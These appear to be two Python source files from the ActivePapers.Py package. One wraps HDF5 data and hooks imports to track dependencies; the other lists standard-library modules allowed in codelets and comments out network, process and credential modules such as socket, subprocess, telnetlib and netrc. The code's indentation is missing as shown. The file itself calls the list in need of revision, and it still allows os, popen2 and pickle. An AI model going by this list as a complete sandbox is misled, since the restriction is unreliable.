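#     ds.attrs['ACTIVE_PAPER_FOO'] = 1               # raises ValueError
#     'ACTIVE_PAPER_GENERATING_CODELET' in ds.attrs  # always False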
class AttrWrapper(collections.MutableMapping):
def __init__(self, node):
self._node = node
@classmethod
def forbidden(cls, key):
return isstring(key) and key.startswith('ACTIVE_PAPER')
def __len__(self):
return len([k for k in self._node.attrs
if not AttrWrapper.forbidden(k)])
def __iter__(self):
for k in self._node.attrs:
if not AttrWrapper.forbidden(k):
yield k
def __contains__(self, item):
if AttrWrapper.forbidden(item):
return False
return item in self._node.attrs
def __getitem__(self, item):
if AttrWrapper.forbidden(item):
raise KeyError(item)
return self._node.attrs[item]
def __setitem__(self, item, value):
if AttrWrapper.forbidden(item):
raise ValueError(item)
self._node.attrs[item] = value
def __delitem__(self, item):
if AttrWrapper.forbidden(item):
raise KeyError(item)
del self._node.attrs[item]
#
# Datasets are wrapped by a class that traces all accesses for
# building the dependency graph.
#
class DatasetWrapper(object):
def __init__(self, parent, ds, codelet):
self._parent = parent
self._node = ds
self._codelet = codelet
self.attrs = AttrWrapper(ds)
self.ref = ds.ref
@property
def parent(self):
return self._parent
def __len__(self):
return len(self._node)
def __getitem__(self, item):
return self._node[item]
def __setitem__(self, item, value):
self._node[item] = value
stamp(self._node, "data", self._codelet.dependency_attributes())
def __getattr__(self, attr):
return getattr(self._node, attr)
def read_direct(self, dest, source_sel=None, dest_sel=None):
return self._node.read_direct(dest, source_sel, dest_sel)
def resize(self, size, axis=None):
self._node.resize(size, axis)
stamp(self._node, "data", self._codelet.dependency_attributes())
def write_direct(self, source, source_sel=None, dest_sel=None):
self._node.write_direct(source, source_sel, dest_sel)
stamp(self._node, "data", self._codelet.dependency_attributes())
def __repr__(self):
codelet = owner(self._node)
if codelet is None:
owned = ""
else:
owned = " generated by %s" % codelet
lines = ["Dataset %s%s" % (self._node.name, owned)]
nelems = np.product(self._node.shape)
if nelems < 100:
lines.append(str(self._node[...]))
else:
lines.append("shape %s, dtype %s"
% (repr(self._node.shape), str(self._node.dtype)))
return "\n".join(lines)
#
# DataGroup is a wrapper class for the "data" group in a paper.
# The wrapper traces access and creation of subgroups and datasets
# for building the dependency graph. It also maintains the illusion
# that the data subgroup is all there is in the HDF5 file.
#
class DataGroup(object):
def __init__(self, paper, parent, h5group, codelet, data_item=None):
self._paper = paper
self._parent = parent if parent is not None else self
self._node = h5group
self._codelet = codelet
self._data_item = data_item
if self._data_item is None and datatype(h5group) == "data":
self._data_item = self
self.attrs = AttrWrapper(h5group)
self.ref = h5group.ref
self.name = h5group.name
@property
def parent(self):
return self._parent
def _wrap_and_track_dependencies(self, node):
ap_type = datatype(node)
if ap_type == 'reference':
from activepapers.storage import dereference
paper, node = dereference(node)
if node.name.startswith('/data/'):
node = paper.data[node.name[6:]]
elif isinstance(node, h5py.Group):
node = DataGroup(paper, None, node, None, None)
else:
node = DatasetWrapper(None, node, None)
else:
if self._codelet is not None:
if ap_type is not None and ap_type != "group":
self._codelet.add_dependency(node.name
if self._data_item is None
else self._data_item.name)
codelet = owner(node)
if codelet is not None \
and datatype(self._node[codelet]) == "calclet":
self._codelet.add_dependency(codelet)
if isinstance(node, h5py.Group):
node = DataGroup(self._paper, self, node,
self._codelet, self._data_item)
else:
node = DatasetWrapper(self, node, self._codelet)
return node
def _stamp_new_node(self, node, ap_type):
if self._data_item:
stamp(self._data_item._node, "data",
self._codelet.dependency_attributes())
else:
stamp(node, ap_type, self._codelet.dependency_attributes())
def __len__(self):
return len(self._node)
def __iter__(self):
for x in self._node:
yield x
def __getitem__(self, path_or_ref):
if isstring(path_or_ref):
path = datapath(path_or_ref)
else:
path = self._node[path_or_ref].name
assert path.startswith('/data')
path = path.split('/')
if path[0] == '':
# datapath() ensures that path must start with
# ['', 'data'] in this case. Move up the parent
# chain to the root of the /data hierarchy.
path = path[2:]
node = self
while node is not node.parent:
node = node.parent
else:
node = self
for element in path:
node = node._wrap_and_track_dependencies(node._node[element])
return node
def get(self, path, default=None):
try:
return self[path]
except KeyError:
return default
def __setitem__(self, path, value):
path = datapath(path)
needs_stamp = False
if isinstance(value, (DataGroup, DatasetWrapper)):
value = value._node
else:
needs_stamp = True
self._node[path] = value
if needs_stamp:
node = self._node[path]
stamp(node, "data", self._codelet.dependency_attributes())
def __delitem__(self, path):
test = self._node[datapath(path)]
if owner(test) == self._codelet.path:
del self._node[datapath(path)]
else:
raise ValueError("%s trying to remove data created by %s"
% (str(self._codelet.path), str(owner(test))))
def create_group(self, path):
group = self._node.create_group(datapath(path))
self._stamp_new_node(group, "group")
return DataGroup(self._paper, self, group,
self._codelet, self._data_item)
def require_group(self, path):
group = self._node.require_group(datapath(path))
self._stamp_new_node(group, "group")
return DataGroup(self._paper, self, group,
self._codelet, self._data_item)
def mark_as_data_item(self):
stamp(self._node, "data", self._codelet.dependency_attributes())
self._data_item = self
def create_dataset(self, path, *args, **kwargs):
ds = self._node.create_dataset(datapath(path), *args, **kwargs)
self._stamp_new_node(ds, "data")
return DatasetWrapper(self, ds, self._codelet)
def require_dataset(self, path, *args, **kwargs):
ds = self._node.require_dataset(datapath(path), *args, **kwargs)
self._stamp_new_node(ds, "data")
return DatasetWrapper(self, ds, self._codelet)
def visit(self, func):
self._node.visit(func)
def visititems(self, func):
self._node.visititems(func)
def copy(self, source, dest, name=None):
raise NotImplementedError("not yet implemented")
def flush(self):
self._paper.flush()
def __repr__(self):
codelet = owner(self._node)
if codelet is None:
owned = ""
else:
owned = " generated by %s" % codelet
items = list(self._node)
if not items:
lines = ["Empty group %s%s" % (self._node.name, owned)]
else:
lines = ["Group %s%s containing" % (self._node.name, owned)]
lines.extend(" "+i for i in items)
return "\n".join(lines)
#
# CodeGroup is a wrapper class for the "code" group in a paper.
# The wrapper provide read-only access to codelets and modules.
#
class CodeGroup(object):
def __init__(self, paper, node):
self._paper = paper
self._node = node
def __len__(self):
return len(self._node)
def __iter__(self):
for x in self._node:
yield x
def __getitem__(self, path_or_ref):
if isstring(path_or_ref):
path = codepath(path_or_ref)
else:
path = self._node[path_or_ref].name
assert path.startswith('/code')
node = self._node[path]
if isinstance(node, h5py.Group):
return CodeGroup(self._paper, node)
else:
return CodeFile(self._paper, node)
def __repr__(self):
return "<CodeGroup %s>" % self._node.name
class CodeFile(object):
def __init__(self, paper, node):
self._paper = paper
self._node = node
self.type = datatype(node)
self.language = language(node)
self.name = node.name
self.code = utf8(node[...].flat[0])
def __repr__(self):
return "<%s %s (%s)>" % (self.type, self.name, self.language)
#
# Initialize a paper registry that permits finding a paper
# object through a unique id stored in the codelet names,
# and a codelet registry for retrieving active codelets.
#
paper_registry = weakref.WeakValueDictionary()
codelet_registry = weakref.WeakValueDictionary()
#
# Identify calls from inside a codelet in order to apply
# the codelet-specific import rules.
#
def get_codelet_and_paper():
"""
:returns: the codelet from which this function was called,
and the paper containing it. Both values are None
if there is no codelet in the call chain.
"""
# Get the name of the source code file of the current
# module, which is also the module containing the Codelet class.
this_module = __file__
if os.path.splitext(this_module)[1] in ['.pyc', '.pyo']:
this_module = this_module[:-1]
# Get call stack minus the last entry, which is the
# method find_module itself.
stack = traceback.extract_stack()[:-1]
# Look for the entry corresponding to Codelet.run()
in_codelet = False
for filename, line_no, fn_name, command in stack:
if filename == this_module \
and command == "execcode(script, environment)":
in_codelet = True
if not in_codelet:
return None, None
# Look for an entry corresponding to codelet code.
# Extract its paper_id and use it to look up the paper
# in the registry.
for item in stack:
module_ref = item[0].split(':')
if len(module_ref) != 2:
# module_ref is a real filename
continue
paper_id, codelet = module_ref
if not codelet.startswith('/code'):
# module_ref is something other than a paper:codelet combo
return None, None
return codelet_registry.get((paper_id, codelet), None), \
paper_registry.get(paper_id, None)
return None, None
#
# Install an importer for accessing Python modules inside papers
#
class Importer(object):
def find_module(self, fullname, path=None):
codelet, paper = get_codelet_and_paper()
if paper is None:
return None
node = paper.get_local_module(fullname)
if node is None:
# No corresponding node found
return None
is_package = False
if node.is_group():
# Node is a group, so this should be a package
if '__init__' not in node:
# Not a package
return None
is_package = True
node = node['__init__']
if datatype(node) != "module" \
or ascii(node.attrs.get("ACTIVE_PAPER_LANGUAGE", "")) != "python":
# Node found but is not a Python module
return None
return ModuleLoader(paper, fullname, node, is_package)
class ModuleLoader(object):
def __init__(self, paper, fullname, node, is_package):
self.paper = paper
self.fullname = fullname
self.node = node
# Python 3.4 has special treatment for loaders that
# have an attribute 'is_package'.
self._is_package = is_package
def load_module(self, fullname):
assert fullname == self.fullname
if fullname in sys.modules:
module = sys.modules[fullname]
loader = getattr(module, '__loader__', None)
if isinstance(loader, ModuleLoader):
assert loader.paper is self.paper
return module
code = compile(ascii(self.node[...].flat[0]),
':'.join([self.paper._id(), self.node.name]),
'exec')
module = imp.new_module(fullname)
module.__file__ = os.path.abspath(self.node.file.filename) + ':' + \
self.node.name
module.__loader__ = self
if self._is_package:
module.__path__ = []
module.__package__ = fullname
else:
module.__package__ = fullname.rpartition('.')[0]
sys.modules[fullname] = module
self.paper._local_modules[fullname] = module
try:
execcode(code, module.__dict__)
except:
del sys.modules[fullname]
del self.paper._local_modules[fullname]
raise
return module
sys.meta_path.insert(0, Importer())
#
# Install an import hook for intercepting imports from codelets
#
standard__import__ = __import__
def ap__import__(*args, **kwargs):
codelet, paper = get_codelet_and_paper()
if codelet is not None:
codelet.track_and_check_import(args[0])
return standard__import__(*args, **kwargs)
activepapers.utility.ap_builtins.__import__ = ap__import__ | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/execution.py | execution.py |
# The following is a complete list of modules in the standard library,
# obtained from an installation of Python 2.7.3. Only modules starting
# with an underscore were removed. Forbidden modules are commented out.
# The selection needs a more careful revision.
allowed_modules = [
#"BaseHTTPServer",
"Bastion",
#"CGIHTTPServer",
"ConfigParser",
"Cookie",
#"DocXMLRPCServer",
"HTMLParser",
"MimeWriter",
"Queue",
#"SimpleHTTPServer",
#"SimpleXMLRPCServer",
#"SocketServer",
"StringIO",
"UserDict",
"UserList",
"UserString",
"abc",
"aifc",
#"antigravity",
#"anydbm",
#"argparse",
#"ast",
"asynchat",
"asyncore",
"atexit",
#"audiodev",
"base64",
#"bdb",
"binhex",
"bisect",
#"bsddb",
#"cProfile",
"calendar",
#"cgi",
#"cgitb",
"chunk",
"cmd",
"code",
"codecs",
"codeop",
"collections",
"colorsys",
"commands",
"compileall",
"compiler",
"config",
"contextlib",
"cookielib",
"copy",
"copy_reg",
"csv",
#"ctypes",
#"curses",
#"dbhash",
"decimal",
"difflib",
"dircache",
#"dis",
#"distutils",
#"doctest",
#"dumbdbm",
#"dummy_thread",
#"dummy_threading",
#"email",
"encodings",
#"filecmp",
#"fileinput",
"fnmatch",
"formatter",
"fpformat",
"fractions",
#"ftplib",
"functools",
"genericpath",
#"getopt",
#"getpass",
"gettext",
#"glob",
#"gzip",
"hashlib",
"heapq",
"hmac",
"hotshot",
"htmlentitydefs",
"htmllib",
#"httplib",
#"idlelib",
"ihooks",
#"imaplib",
"imghdr",
#"importlib",
#"imputil",
"inspect",
"io",
"json",
"keyword",
"lib2to3",
"linecache",
"locale",
"logging",
#"mailbox",
#"mailcap",
"markupbase",
"md5",
"mhlib",
"mimetools",
"mimetypes",
"mimify",
#"modulefinder",
"multifile",
#"multiprocessing",
#"mutex",
#"netrc",
"new",
#"nntplib",
#"ntpath",
#"nturl2path",
"numbers",
"opcode",
"optparse",
"os",
#"os2emxpath",
#"pdb.doc",
#"pdb",
"pickle",
"pickletools",
"pipes",
"pkgutil",
"plistlib",
"popen2",
"poplib",
"posixfile",
"posixpath",
"pprint",
"profile",
"pstats",
#"pty",
"py_compile",
"pyclbr",
#"pydoc",
#"pydoc_data",
"quopri",
"random",
"re",
"repr",
"rexec",
"rfc822",
"rlcompleter",
"robotparser",
"runpy",
"sched",
"sets",
"sgmllib",
"sha",
"shelve",
"shlex",
"shutil",
#"site",
#"smtpd",
#"smtplib",
#"sndhdr",
#"socket",
#"sqlite3",
"sre",
"sre_compile",
"sre_constants",
"sre_parse",
#"ssl",
#"stat",
#"statvfs",
"string",
"stringold",
"stringprep",
"struct",
#"subprocess",
#"sunau",
#"sunaudio",
"symbol",
"symtable",
"sysconfig",
"tabnanny",
#"tarfile",
#"telnetlib",
"tempfile",
"test",
"textwrap",
#"this",
#"threading",
"timeit",
"token",
"tokenize",
#"trace",
#"traceback",
"tty",
"types",
#"unittest",
#"urllib",
#"urllib2",
"urlparse",
"user",
"uu",
#"uuid",
"warnings",
#"wave",
"weakref",
#"webbrowser",
#"whichdb",
"wsgiref",
"xdrlib",
"xml",
"xmllib",
"xmlrpclib",
"zipfile",
## extension modules
#"OSATerminology",
"array",
#"audioop",
#"autoGIL",
"binascii",
#"bsddb185",
"bz2",
"cPickle",
"cStringIO",
"cmath",
"crypt",
"datetime",
#"dbm",
#"fcntl",
#"future_builtins",
#"gdbm",
#"gestalt",
#"grp",
#"icglue",
"itertools",
"math",
#"mmap",
"nis",
"operator",
"parser",
"pyexpat",
#"readline",
#"resource",
#"select",
"strop",
#"syslog",
#"termios",
"time",
"unicodedata",
"zlib",
] | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/standardlib2.py | standardlib2.py |